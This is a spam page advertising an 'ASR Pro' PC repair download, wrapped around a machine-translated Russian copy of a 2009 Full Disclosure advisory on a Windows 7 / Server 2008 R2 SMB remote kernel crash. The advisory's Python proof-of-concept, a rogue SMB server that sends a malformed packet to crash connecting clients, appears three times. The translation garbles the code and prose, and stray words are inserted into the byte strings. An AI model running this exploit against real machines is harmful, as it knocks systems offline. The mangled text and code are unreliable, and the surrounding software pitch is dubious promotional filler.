Одобрено

  • 1. Скачать ASR Pro
  • 2. Откройте программу и выберите "Просканировать компьютер"
  • 3. Нажмите "Восстановить", чтобы начать процесс восстановления.
  • Программное обеспечение для ремонта ПК находится всего в одном клике — загрузите его прямо сейчас. г.

    Если на ваш компьютер падает удаленное ядро ​​Windows 7 на Server 2008r2, мы надеемся, что руководство пользователя поможет вам успешно решить эту проблему. грамм.Полезно для Microsoft Windows / Server 2008 R2 SMB Client Infinite Loop: он использует повреждение для выполнения операций в SMB-клиенте Microsoft Windows в Windows, а также в Windows Server 2008 R2. В основном это дает сбой удаленного ядра. Metasploit Framework содержит модуль, который поможет использовать мою уязвимость.

    грамм.

      #! / usr / bin или питон# win7-crash.Trigger py:# удаленные аварии ядра на хост-сервере Win7 в сочетании с 2008R2 (бесконечный цикл)# KeAccumulateTicks () вылетает, вы заплатите NT_ASSERT () / DbgRaiseAssertionFailure (), вызванные мощным# Бесконечный цикл.# НЕТ BSOD, ВЫ ДОЛЖНЫ ОТСОЕДИНИТЬ РАЗЪЕМ.# Чтобы вызвать это быстро; в select:  this_script_ip_addr  BLAH, проверка столкновений выполняется без особых усилий# Автор: Лоран Гаффи ¯ ¿ ½Импортировать сервер сокетовПакет равен (длина числа " x00  x00  x00  x9a" ---> требование должно быть 9-м, а не 9a .." xfe  x53  x4d  x42  x40  x00  x00  x00  x00  x00  x00  x00  x00  x00  x01  x00"" x01  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x41  x00  x01  x00  x02  x02  x00  x00  x30  x82  xa4  x11  xe3  x12  x23  x41"" xaa  x4b  xad  x99  xfd  x52  x31  x8d  x01  x00  x00  x00  x00  x00  x01  x00"" x00  x00  x01  x00  x00  x00  x01  x00  xcf  x73  x67  x74  x62  x60  xca  x01"" xcb  x51  xe0  x19  x62  x60  xca  x01  x80  x00  x1e  x00  x20  x4c  x4d  x20"" x60  x1c  x06  x06  x2b  x06  x01  x05  x05  x02  xa0  x12  x30  x10  xa0  x0e"" x30  x0c  x06  x0a  x2b  x06  x01  x04  x01  x82  x37  x02  x02  x0a")Сеанс SMB2 (SocketServer.BaseRequestHandler):  Деф-Хэндл (сама):        печать "Кто:", self.client_address        Используйте "СПАСИБО SDL"       Запись подразумевает self.request.recv (1024)        self.request.send (пакет)        self.request.close ()запуск равен SocketServer.TCPServer (('', 445), SMB2) # слушать на всех интерфейсах city 445launch.serve_forever ()             

    Эта ошибка является важным свидетельством того, что SDL FAIL
    Целью ошибки является бесконечный цикл на smb1,2, предварительная аутентификация, учетные данные точно не требуются …
    Может быть запущен в локальной сети с помощью (IE *)
    Ошибка, вероятно, позволит им быть настолько простыми, что поощряется обнаружение через 2 года назад с помощью определенного SDL, если какой-либо SDL уже существовал:

    netbios_header подразумевает struct.pack (“> i”, len (”. подписаться на (SMB_packet)) + SMB_packet
    (Термины netbios h2 указывают длину дополнительного пакета smb1,2.)

    Если сотовый номер netbios_header на 4 байта меньше или больше SMB_packet, ситуация, естественно, нарушается!
    КАКИЕ ?? Ты что, шутишь, где мой SDL?!?

    удаленный сбой ядра Windows 7 / waiter 2008r2

    «Самый безопасный рабочий подиум на свет. Е»;
    То, что ваш удивительно правильный брандмауэр настроен, вероятно, следует удалить через IE, даже с помощью метода вещания nbns (без настраиваемого взаимодействия)

    ================================================
    – Дата выпуска: 11 ноября 2009 г.
    – Обнаружил: Лоран Гаффье
    – Уровень серьезности: средний / высокий
    ==============================================

    удаленный сбой ядра windows many / server 2008r2

    NS. ПОДТВЕРЖДЕНИЕ КОНЦЕПЦИИ
    ————————–
    # win7-crash.py:
    # Запуск реального удаленного компьютера помогает сбой ядра под Win7 и конечный результат Server 2008R2 (бесконечный цикл)
    # KeAccumulateTicks () аварийно завершил работу из-за NT_ASSERT () / DbgRaiseAssertionFailure (), вызванного сильным бесконечным циклом числа.
    # НЕТ BSOD, У ВАС ЕСТЬ ПРОБКА.
    # Чтобы вызвать это быстро; по порядку: this_script_ip_addr BLAH, сразу уменьшите
    # Автор: Лоран Гаффье
    #

    Пакет подразумевает (число ” x00 x00 x00 x9a” —> пятая длина действительно должна быть 9a ..
    ” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
    ” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
    ” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″
    ” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
    ” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
    ” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson xperia x10 xa0 x0e”
    ” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)

    V. КОММЕРЧЕСКОЕ ВОЗДЕЙСТВИЕ
    ————————–
    Злоумышленник может удаленно выключить любой сервер Windows 2008R2 Server 7 –
    в локальной сети или предоставляется IE

    Vii. Патч-решение
    ————————–
    возможно, недоступен для этого случая, индивидуальному интернет-провайдеру все равно.
    Закройте возможности SMB и порты до тех пор, пока не будет обеспечен достоверный аудит.

    X. ИСТОРИЯ ИЗМЕНЕНИЙ
    ————————–
    8 ноября 2009 г .: MSRC связалась с
    8 ноября 2009 г .: MSRC обнаружила уязвимость
    11 ноября 2009 г .: MRSC пытается убедить меня, потому что есть отличная ошибка IPv6 от различных поставщиков, которая не должна появляться на плакатах по безопасности.
    11 ноября 2009 г .: Это ценное насекомое было выпущено на волю.

    XI. ПРИМЕЧАНИЯ
    ————————–
    Юридическая информация, содержащаяся в отдельном уведомлении, предоставляется «как есть»
    без заявлений или гарантий целесообразности, кроме них.
    Я не принимаю убытки по вине оператора в качестве альтернативы
    Неправильное использование этой информации.

    Полное раскрытие информацииАрхивы списков рассылки

    <размер диапазона равен "+ 2"> Ошибка удаленного ядра Windows 5 Server 2008R2<время>От: laurent gaffie
    Дата: gmail среда, 11 ноября 2009 г., 05:58:44 – 05:00
    <время> ==============================================- ДАТА выдачи: 11 ноября 2009 г.- Только что обнаружил: Лоран Гаффье- Степень серьезности: средняя / высокая.================================================I. УЯЗВИМОСТЬ————————–Удаленная блокировка ядра Windows 1, * Server 2008R2II. КОНТЕКСТ————————–# FAIL, # FAIL, # FAILSDL FAIL, «Самая безопасная операционная система на свете» -> Удаленное ядро ​​за считанные минуты.# FAIL, номер FAIL, # FAILIII. ОПИСАНИЕ————————–См. Http://g-laurent.blogspot.com/, предназначенный для получения дополнительной информации и многих деталей.# Комментарий: эта ошибка известна еще в Windows 7 / 2008R2.NS. КОНЦЕПТУАЛЬНЫЕ ДОКАЗАТЕЛЬСТВА————————–# win7-crash.py:# Запуск другого удаленного сбоя ядра еще под Win7 в дополнение к удаленному компьютеру 2008R2 (бесконечный цикл)# KeAccumulateTicks () аварийно завершает работу из-за NT_ASSERT () / DbgRaiseAssertionFailure ()summoningano бесконечный цикл.# NO BSOD, ВЫ ОТСОЕДИНИТЕ РАЗЪЕМ.# Для быстрого запуска через цель: this_script_ip_addr BLAH, сразукрушение# Автор: Лоран Гаффье#Импортировать сервер сокетовПакет подразумевает ” x00 x00 x00 x9a” # —> вероятно 9-е, а не 9a.” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson x10 xa0 x0e”” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”Класс SMB2 (SocketServer.BaseRequestHandler): outl manage (авто): “Кто:” Изображение, self.client_address Запись означает, что self.request.recv (1024) self.request.send (пакет) self.request.close ()Start означает SocketServer.TCPServer ((”, 445), SMB2) # прослушивание всех портов445запустить interface.serve_forever ()#SDL FAILV. БИЗНЕС Атака нового агрессора————————–и может удаленно вывести из строя любую Windows 7 / Server 2008R2.VI … ЗАБРОНИРОВАННЫЕ СИСТЕМЫ————————–Windows 7, Windows 2008R2VII сервер. РЕШЕНИЕ————————–Патча на данный момент обычно нет, самому производителю на это наплевать.Закройте элемент SMB и вентилируйте до тех пор, пока в буквальном смысле не будет проведен реальный аудит.VIII. ИСПОЛЬЗОВАННАЯ ЛИТЕРАТУРА————————–http://blogs.msdn.com/sdl/http://g-laurent.blogspot.com/http://twitter.com/g_laurentIX. Займы————————–Эта уязвимость была реализована благодаря Лорану Гаффье. обнаруженныйLaurent.gaffieremove-this (at) gmail.comX. ИСТОРИЯ ИЗМЕНЕНИЙ————————–8 ноября 2009 г .: обратился в MSRC.9 ноября 2009 г .: MSRC обнаружила вашу уязвимость.11 ноября 2009 г .: MRSC пытается убедить себя, что IPv6 от различных поставщиков является ошибкой.не должно появляться в бюллетенях по безопасности.11 ноября, 09: Выпущен Win Remote 7 Kernel SmashXI. ЮРИДИЧЕСКОЕ УВЕДОМЛЕНИЕ————————–Информация в этом определении предоставляется «как есть».без гарантий или просто предложений использования, или иногда иным образом.Я не несу ответственности за износ, вызванный использованием и илизлоупотреблять этой информацией.XII Личные заметки————————–Более удаленные ядра FD @MS появятся позднее.

     ________________________________________________ПолМое раскрытие всей информации - доверяю прямо сейчас.Устав: http://lists.grok.org.uk/full-disclosure-charter.htmlТолько что опубликовано и спонсировано Secunia Http: // secunia-.com/ 

    <время>

    по дате по Проволока

    <размер диапазона означает "+ 1"> Текущий поток:

    • Сбой мощного удаленного ядра Windows Server 2008R2, автор – Лоран Гаффи (11 ноября).

    Одобрено

    Инструмент восстановления ASR Pro — это решение для ПК с Windows, который работает медленно, имеет проблемы с реестром или заражен вредоносным ПО. Этот мощный и простой в использовании инструмент может быстро диагностировать и исправлять ваш компьютер, повышая производительность, оптимизируя память и улучшая безопасность в процессе. Больше не страдайте от вялости компьютера - попробуйте ASR Pro сегодня!


    Программное обеспечение для ремонта ПК находится всего в одном клике — загрузите его прямо сейчас. г.

    г.